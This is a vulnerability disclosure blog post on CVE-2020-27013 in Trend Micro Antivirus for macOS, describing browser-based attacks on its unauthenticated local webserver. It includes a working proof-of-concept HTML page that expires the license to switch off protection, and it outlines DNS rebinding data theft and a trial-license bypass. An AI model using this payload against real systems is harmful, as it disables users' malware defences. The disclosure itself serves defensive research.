2020-10-29 09:30 | Cees Elzinga

CVE-2020-27013: Trend Micro Antivirus for macOS - Part 1

In this 3-part blog post we will take a deep-dive into Trend Micro Antivirus for macOS. In our normal blogs we often detail a single security issue. This time we will dig deeper and look at multiple attack vectors against a single product:

Part 1: Attacks from the browser

Trend Micro Antivirus offers online security and antivirus protection for macOS devices.

Trend Micro main interface

In thist post we will look at attacks from the browser. We will try to attack a client that has Trend Micro Antivirus installed and visits our malicious website. We had two specific attacks in mind:

  • Try to bypass Trend Micro's protections
  • Try to exploits an issue in Trend Micro itself

We did not found any exploits in Trend Micro itself, but did find various other attacks.

Local webserver

Trend Micro installs a local webserver that is running on 127.0.0.1:37847. It uses this for a form of inter-process communication. The webserver is used, for example, to check the expiration status of the license:

[email protected] ~ % curl 'localhost:37848/GetProperty?Expiration'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Expiration</key>
    <string>610581599.000000</string>
</dict>
</plist>

The webserver is running under iCoreService process with the iTISPlugun and is running as root:

[email protected] ~ % sudo lsof | grep 37848
COMMAND    PID USER   FD      TYPE  NAME
iCoreServ 2890 root   11u     IPv4  localhost:37848 (LISTEN)

The example curl 'localhost:37848/GetProperty?Expiration' reads the Expiration property. Reversing shows that the backing data is stored in a plist file: /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/Versions/A/Resources/TMPlugin.plist. The contents of this file is partially encrypted:

[email protected] ~ % cat TMPlugin.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>00D62AD3522F12420D3A269CE3752750</key>
    <string>2150C0B98A8767711DB1FD28470E633C678B5C494924DA53A5AAB9B2BF3DB2279E987B34033F69C52D5CE4DCB2376D85</string>
    <key>0B6695E9434D90DF02C936E3101FD1FA</key>
    ... more data

Vulnerability

The bug/vulnerability is that users can not only read these properties but also write them. And since the webserver doesn't use authentication, any (malicious) website can modify these settings as well. Some of the (decrypted) settings sound interesting:

__EnableWebThreatProtection__
__EnableScheduledScan__
lastOneDayLaunchDate
LastAUTime
LicenseStatus
__EnableRealTimeScan__
... many more

It looks like this might allow a trivial bypass of Trend Micro: a malicious website can disable __EnableWebThreatProtection__ and launch the real attack. However, I think the developers knew this might be a problem and they protected some of the properties. All settings starting with underscores are protected from modification (eg: __EnableRealTimeScan__). But this blacklist is only for a small number of properties. A malicious website can still modify the remaining properties. Three example attacks are listed below.

Attack 1: Disabling Trend Micro Antivirus

Attack 1 mimics a website wants to do something malicious, for example install malware. But the malware would be detected by Trend Micro. Using the insecure webserver the website can disable the AV and stop any protection it provided. It can then continue to install the malware undetected.

As discussed before some of the properties, such as __EnableRealTimeScan__ are protected from modification. The exploit therefore uses another trick: it sets the license to an expired state.

The following screenshots show a full exploit flow:

  • Start situation: machine is protected from malware (EICAR test virus)
Trend Micro EICAR
  • Exploitation: The user visits a malicious website. The website does an AJAX call to the API that expires the Trend Micro license. (Note: the malicious website won't be able to read the data from the AJAX call as it's protected by CORS. Attack 2 will bypass that. For now it doesn't matter, calling the API is enough)

Source code of the malicious website:

<html><head><script>
var request = new XMLHttpRequest();
request.open("GET", "http://127.0.0.1:37848/SetProperty?LicenseStatus=2");
request.send();
</script></head><body><h1>Malicious website</h1></body></html>
  • Exploitation: Malware installs malware. Trend Micro no longer protects the machine
Trend Micro disabled

Attack 2: Malicious websites can steal configuration info (SN, Email, etc)

As shown above malicious websites can set properties. But they won’t be able to read them. The browser won’t allow this due to Cross-Origin Resource Sharing (CORS).

An attacker can bypass this by using DNS rebinding. This allows malicious websites to read the data returned by the API. Attackers can then steal configuration information such as the serial number, email address, etc.

Attack 3: Keygen / license verification bypass

Another attack is to change the settings of the trial license. By updating the expiration time any user can extend their trial license into a free full version, resulting in loss of profit for Trend Micro.

Trend Micro keygen

Fixes

These issue was reported to the Zero Day Initiative and are tracked under ZDI-20-1243. It got CVE-2020-27013, and was patched on 2020-10-14. Additional details are available in on Trend Micro's advisory TMKA-09950.

Conclusion

In part 1 of this series we have shown how a malicious website can disable Trend Micro Antivirus before attempting to install malware.

In the next part we will show how a local user can abuse Trend Micro Antivirus to get code execution as root.


Kontakt os

+45 2054 4448

[email protected]

Vester Farimagsgade 41, 1606 København V

Services | Uddannelse | Blog

© 2020 Danish Cyber Defence A/S · Vester Farimagsgade 41 · 1606 København V · CVR 38871064